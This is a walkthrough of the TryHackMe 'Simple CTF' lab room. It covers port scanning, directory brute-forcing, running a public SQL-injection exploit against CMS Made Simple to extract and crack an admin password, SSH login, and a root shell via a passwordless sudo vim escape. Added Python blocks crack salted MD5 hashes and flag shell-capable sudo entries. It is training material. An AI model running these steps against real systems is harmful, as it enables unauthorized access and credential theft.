📝 TryHackMe. Walkthrough: Simple CTF
- Platform: TryHackMe
- Room name: Simple CTF
- Difficulty: Easy
How many services are running under port 1000?
$ nmap -A 10.10.203.52
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Note that a plain nmap -A scans nmap's 1,000 most common ports rather than ports 1-1000 (which is why 2222 shows up); add -p 1-1000, or -p- for a full sweep, if you want to be sure the count of services under port 1000 is complete.
Answer: *
What is running on the higher port?
Answer: s**
What’s the CVE you’re using against the application?
Let's brute-force directories on the web server.
$ python3 dirsearch.py -u http://10.10.203.52/
...
[13:47:22] 200 - 929B - /robots.txt
[13:47:26] 301 - 313B - /simple -> http://10.10.203.52/simple/
The /simple/ directory hosts a website; the footer says it runs on CMS Made Simple version 2.2.8:
This site is powered by CMS Made Simple version 2.2.8
Let's look for available exploits with searchsploit.
$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
$ searchsploit -m 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text
The SQLi entry is the one for us: it covers versions below 2.2.10 and, unlike the 2.2.x RCE entries in the list, does not require authenticated access, which we do not have yet.
Answer: CVE-2019-****
To what kind of vulnerability is the application vulnerable?
Answer: sq**
What’s the password?
$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
$ python 46635.py -u http://10.10.203.52/simple/ --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
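The --crack step above is a plain offline dictionary attack once the salt and hash have been pulled out via the injection. Here is that step as an added example; it is not part of the writeup or of 46635.py. It assumes the scheme the exploit checks candidates against, md5(salt + password), which is how CMS Made Simple 2.x stores its admin password. The salt, hash and wordlist in the block are constructed for the demo, not the values printed above, and parse_exploit_output() reads the salt and hash back out of lines in the exploit's output format so you can retry with a bigger wordlist without re-running the slow time-based injection.

```python
import hashlib
import re
from typing import Iterable, Optional


def cmsms_hash(salt: str, password: str) -> str:
    # CMS Made Simple 2.x password storage as assumed by the exploit's --crack
    # routine: md5(salt . password), hex-encoded.
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def crack(salt: str, target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose salted MD5 equals target_hash, else None."""
    target_hash = target_hash.strip().lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not candidate:
            continue
        if cmsms_hash(salt, candidate) == target_hash:
            return candidate
    return None


def crack_file(salt: str, target_hash: str, path: str) -> Optional[str]:
    """Same as crack(), streaming a wordlist file so big lists are not read into memory."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return crack(salt, target_hash, fh)


# The exploit prints the extracted salt and hash in "[+] ... found: value" lines;
# parse them back out so the crack can be re-run without another injection.
_SALT_RE = re.compile(r"Salt for password found:\s*([0-9a-fA-F]+)")
_HASH_RE = re.compile(r"Password found:\s*([0-9a-fA-F]{32})")


def parse_exploit_output(text: str):
    salt = _SALT_RE.search(text)
    digest = _HASH_RE.search(text)
    if not salt or not digest:
        raise ValueError("salt or password hash not found in exploit output")
    return salt.group(1), digest.group(1)


# Constructed demo values (not the room's salt/hash): the hash is derived here
# from a known password so the example is self-checking.
DEMO_SALT = "0123456789abcdef"
DEMO_PASSWORD = "letmein"
DEMO_OUTPUT = (
    "[+] Salt for password found: " + DEMO_SALT + "\n"
    "[+] Username found: demo\n"
    "[+] Email found: demo@example.invalid\n"
    "[+] Password found: " + cmsms_hash(DEMO_SALT, DEMO_PASSWORD) + "\n"
)
DEMO_WORDLIST = ["123456", "password", "letmein", "secret"]


def demo() -> Optional[str]:
    salt, digest = parse_exploit_output(DEMO_OUTPUT)
    return crack(salt, digest, DEMO_WORDLIST)


if __name__ == "__main__":
    print(demo())
```

To repeat the step the exploit performed, call crack_file() with the salt and hash it printed and the path to your wordlist; a None result just means the password is not in that list, not that the hash or scheme is wrong.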
Where can you login with the details obtained?
Besides the CMS admin panel, we can also try these credentials against SSH, which the scan showed on port 2222.
Answer: s*h
What’s the user flag?
Log in over SSH (port 2222) as that user and read the flag file in the home directory.
Answer: ***d **b, ke** u*!
Is there any other user in the home directory? What’s its name?
ls -la /home/
Answer: su****h
What can you leverage to spawn a privileged shell?
Let's check what we are allowed to run with sudo:
$ sudo --list
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Answer: **m
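An added example, not from the original writeup, of automating this check: it parses sudo -l output (a constructed sample that includes the vim line from above) and flags entries that hand out a shell, either ALL or a binary with a known in-program shell escape such as vim's :! command. SHELL_ESCAPES is a deliberately partial list and an assumption of this example; GTFOBins covers many more binaries.

```python
import re

# Binaries that can spawn a shell or run arbitrary commands from inside the
# program (vim's ':!', less's '!', etc.). Partial list, assumed for this example.
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                 "python", "python3", "perl", "bash", "sh"}

# One sudoers entry as printed by `sudo -l`: "(runas_user : runas_group) TAG: cmd, cmd"
_ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(output: str) -> list:
    """Return one dict per allowed command: run-as user, NOPASSWD flag, command string."""
    entries = []
    in_list = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_list = True
            continue
        if not in_list:
            continue
        m = _ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        runas_user = runas.split(":")[0].strip() or "root"
        tagset = {t.strip().upper() for t in tags.split(":") if t.strip()}
        for cmd in commands.split(","):
            entries.append({
                "runas": runas_user,
                "nopasswd": "NOPASSWD" in tagset,
                "command": cmd.strip(),
            })
    return entries


def shell_capable(entries: list) -> list:
    """Entries that give a shell: 'ALL', or a binary with a known shell escape."""
    hits = []
    for e in entries:
        if e["command"] == "ALL":
            hits.append(e)
            continue
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            hits.append(e)
    return hits


# Constructed `sudo -l` output; only the vim line is taken from the room.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (www-data) /usr/bin/less /var/log/apache2/*, /bin/cat /var/log/syslog
    (root) NOPASSWD: /sbin/reboot
"""


def audit(output: str = SAMPLE_SUDO_L) -> list:
    return shell_capable(parse_sudo_l(output))


if __name__ == "__main__":
    for hit in audit():
        flag = "no password" if hit["nopasswd"] else "password required"
        print(f"{hit['runas']:10} {flag:18} {hit['command']}")
```

On a target, save the listing with sudo -l > sudo.txt and pass the file's contents to audit(); a hit that runs as root with NOPASSWD, like the vim entry here, is the one to try first.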
What’s the root flag?
Get a root shell through vim, which sudo lets us run as root without a password (the :! command runs a shell from inside vim):
$ sudo vim -c ':!/bin/sh'
Then read the flag file in /root/:
Answer: W*** d***. **u **** ***